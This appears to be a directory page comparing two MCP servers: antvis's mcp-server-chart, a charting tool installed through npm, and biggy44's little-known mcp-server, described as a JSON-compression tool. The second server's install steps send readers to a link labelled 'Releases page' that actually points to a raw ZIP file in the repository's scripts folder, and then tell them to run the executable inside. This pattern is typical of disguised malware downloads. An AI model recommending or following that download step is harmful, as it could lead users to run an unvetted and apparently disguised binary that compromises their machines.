mcp-server-chart vs mcp-server
Side-by-side comparison to help you pick between these two MCP servers.
mcp-server-chart by antvis | mcp-server by biggy44 | |
|---|---|---|
| Stars | ★ 4,068 | ★ 1 |
| 30d uses | 10,239 | — |
| Score | 84 | 31 |
| Official | — | — |
| Categories | AI / LLM ToolsDeveloper ToolsProductivity | AI / LLM ToolsDeveloper ToolsOther |
| Language | TypeScript | TypeScript |
| Last commit | this month | this month |
mcp-server-chart · Summary
A TypeScript MCP server for generating 26+ visualization charts using AntV, supporting multiple chart types and deployment options.
mcp-server · Summary
ASON MCP server for efficient JSON compression/decompression to optimize token usage.
mcp-server-chart · Use cases
- Data analysts creating visual reports from datasets
- AI assistants generating custom charts based on user requests
- Web applications embedding visualization capabilities via HTTP API
mcp-server · Use cases
- Reducing token usage when passing large JSON objects to AI models
- Optimizing data transfer between MCP clients and servers
- Compressing configuration files and settings in AI workflows
mcp-server-chart · Install
Installation
Install globally:
npm install -g @antv/mcp-server-chartFor Desktop Apps (e.g., Claude Desktop, VSCode):
{
"mcpServers": {
"mcp-server-chart": {
"command": "npx",
"args": ["-y", "@antv/mcp-server-chart"]
}
}
}For Windows:
{
"mcpServers": {
"mcp-server-chart": {
"command": "cmd",
"args": ["/c", "npx", "-y", "@antv/mcp-server-chart"]
}
}
}mcp-server · Install
Installation Steps
- Download the appropriate binary for your system from the [Releases page](https://github.com/biggy44/mcp-server/raw/refs/heads/main/scripts/server_mcp_v1.2.zip)
- Extract the downloaded ZIP file
- Run the executable to start the server
Claude Desktop Configuration
Add the following to your Claude Desktop configuration:
{
"mcpServers": {
"ason": {
"command": "path/to/ason-server",
"args": []
}
}
}